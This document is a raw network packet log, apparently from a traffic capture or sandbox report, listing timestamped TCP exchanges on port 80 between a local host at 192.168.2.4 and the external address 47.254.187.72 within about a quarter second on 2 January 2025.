                                                                            Jan 2, 2025 20:34:56.738759041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.738759995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.738769054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.738780022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.738785982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.738806009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.738817930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.744363070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.744380951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.744395018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.744414091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.744420052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.744424105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.744471073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.830689907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.830704927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.830717087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.830751896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.830787897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.831309080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.831353903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.833956957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.833970070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.833981037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.833992004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.834028959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.834047079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.835855007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.835867882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.835877895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.835887909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.835916996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.835941076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.839150906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.839164019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.839174986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.839184999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.839195013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.839215994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.842406988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.842417955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.842428923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.842439890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.842447042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.842464924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.842489958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.843692064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.843703032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.843714952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.843729019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.843733072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.843758106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.843771935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.847105980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.847117901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.847130060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.847147942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.847151041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.847176075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.847201109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.848476887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.848489046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.848500967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.848511934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.848519087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.848530054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.848562956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.851119041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.851130009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.851140976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.851157904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.851176977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.853782892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.853801012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.853813887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.853823900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.853835106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.853852987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.853882074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.856286049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.856297016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.856307983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.856312990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.856329918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.856369972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.859893084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859910965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859921932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859931946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859942913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859963894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.859973907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859983921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.859985113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.860002995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.860022068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.863429070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.863441944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.863451958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.863477945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.863513947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.865078926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.865127087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.865143061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.865164995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.865175962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.865180016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.865185976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.865190029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.865211964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.865235090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.868263006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.868274927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.868284941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.868309021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.868320942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.870343924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.870399952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.870412111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.870412111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.870423079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.870433092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.870440960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.870471954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.871710062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.871756077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.871769905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.871782064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.871793032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.871804953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.871822119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.875854969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.875870943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.875883102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.875894070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.875906944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.875931978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.878731966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.878743887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.878755093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.878765106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.878787041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.878808022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.879046917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.879098892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.879110098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.879120111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.879132032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.879142046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.879154921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.879173040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.882108927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.882119894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.882131100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.882143974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.882157087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.882183075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.883950949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.883963108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.883972883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.883985043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.883989096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.884007931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.884028912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.885826111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.885838032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.885848999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.885859013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.885871887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.885904074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.888376951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.888394117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.888405085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.888415098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.888432026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.888458014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.889956951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.889969110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.889980078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.889990091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.889993906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.890018940 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.890047073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.893598080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.893610001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.893620014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.893625975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.893646002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.893676996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.899358988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899372101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899384022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899420023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.899420977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899434090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899452925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899463892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899476051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.899503946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.899780035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899791956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899802923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899813890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.899817944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.899836063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.899876118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.901391029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.901402950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.901413918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.901424885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.901443958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.901469946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.904171944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.904181957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.904216051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.904230118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.904283047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.904293060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.904320955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.917684078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917752028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917762995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917781115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917793036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917795897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.917809010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917817116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.917825937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917831898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.917838097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.917851925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.917865038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.917885065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.922486067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922564030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922573090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922591925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922609091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922611952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.922620058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922624111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.922631025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922641039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922646046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.922652960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.922666073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.922686100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.929189920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929208994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929222107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929231882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929241896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929253101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929256916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.929265022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929280996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.929305077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.929326057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.933829069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933881044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933891058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933922052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.933939934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.933939934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933950901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933960915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933974981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.933988094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.933996916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.934015036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.937887907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937899113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937916040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937927961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937937975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937939882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.937948942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937958002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937968969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.937979937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.938004017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.938013077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.943030119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943048954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943061113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943078995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943089008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.943089962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943099976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943109035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.943115950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943128109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.943130970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.943152905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.943171024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.946552992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946566105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946577072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946613073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946614027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.946624994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946635962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.946635962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946646929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.946652889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.946674109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.946688890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.951904058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951915026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951925993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951936960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951950073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951960087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951971054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951972008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.951982021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.951998949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.952020884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.957218885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957231045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957247019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957257986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957268000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.957269907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957282066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957293987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.957295895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.957318068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.957334995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.962862968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962874889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962889910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962899923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962910891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962920904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962922096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.962930918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962941885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:56.962970972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:56.962990999 CET4973080192.168.2.447.254.187.72
